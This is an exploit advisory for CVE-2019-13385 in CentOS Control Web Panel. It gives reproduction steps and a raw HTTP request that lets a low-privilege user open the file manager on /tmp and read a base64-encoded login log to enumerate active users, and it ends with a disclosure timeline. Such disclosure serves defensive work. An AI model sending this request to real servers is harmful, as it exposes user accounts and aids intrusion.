# Exploit Title: CWP (CentOS Control Web Panel) User Enumeration # Date: 23 July 2019 # Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak # Vendor Homepage: https://control-webpanel.com/ # Version: 0.9.8.836 to 0.9.8.840 # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-13385 +++++++++++++++++++++++++++++++++ # Description: +++++++++++++++++++++++++++++++++ An attacker who gains access as a low privilege user can check active users on the system by checking log file. The access log is stored at /tmp directory with encoded content in base64 format. +++++++++++++++++++++++++++++++++ # Steps to Reproduce +++++++++++++++++++++++++++++++++ 1. Login as a low privilege user 2. Browse to https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/username/fileManager2.php?frame=3&fm_current_dir=/tmp/// 3. login log is login.log file in base64 format Request: GET /cwp_70b80498fb4cb150/user1/fileManager2.php?frame=3&fm_current_dir=/tmp/// HTTP/1.1 Host: 192.168.40.129:2083 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: https://192.168.40.129:2083/cwp_70b80498fb4cb150/user1/fileManager2.php?frame=2 Accept-Encoding: gzip, deflate Accept-Language: en,th-TH;q=0.9,th;q=0.8 +++++++++++++++++++++++++++++++++ # PoC +++++++++++++++++++++++++++++++++ https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13385.md +++++++++++++++++++++++++++++++++ # Timeline +++++++++++++++++++++++++++++++++ 2019-07-03: Discovered the bug 2019-07-03: Reported to vendor 2019-07-04: Vender accepted the vulnerability 2019-07-11: The vulnerability has been fixed 2019-07-23: Published +++++++++++++++++++++++++++++++++ # Discovered by +++++++++++++++++++++++++++++++++ Pongtorn Angsuchotmetee Nissana Sirijirakal Narin Boonwasanarak